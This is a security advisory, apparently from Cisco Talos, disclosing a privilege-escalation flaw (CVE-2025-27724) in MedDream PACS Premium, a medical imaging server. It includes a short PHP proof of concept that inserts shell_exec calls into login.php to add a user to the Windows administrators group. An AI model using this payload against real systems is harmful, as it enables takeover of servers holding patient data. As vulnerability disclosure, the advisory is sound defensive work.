CVE-2025-27724
A privilege escalation vulnerability exists in the login.php functionality of meddream MedDream PACS Premium 7.3.3.840. A specially crafted .php file can lead to elevated capabilities. An attacker can upload a malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.3.840
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-284 - Improper Access Control
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
Insufficient NTFS file permissions allow anyone with login access to alter PHP files, particularly the login.php file, and insert shell commands to add an account to the administrators group. Consequently, this can grant administrative rights from a hacker’s perspective to the account by itself.
Some basic instructions like the following can be added in the head of the login.php file to demonstrate adding a user account named dummyone
print "\nBefore dummyone absent of administrators group user\n";
$out=shell_exec('net localgroup administrators');
echo '<pre>'.$out.'</pre>';
print "\nNow localgroup administrators contains user dummyone \n";
$out=shell_exec('net localgroup administrators dummyone /add');
$out=shell_exec('net localgroup administrators');
echo '<pre>'.$out.'</pre>';
Once the login.php file is reloaded, as the Meddream web interface is running under nt authority\system, it will automatically add the account dummyone to the local administrators group.
2025-03-26 - Vendor Disclosure
2025-07-28 - Vendor Patch Release
2025-07-28 - Public Release
Discovered by Emmanuel Tacheau of Cisco Talos.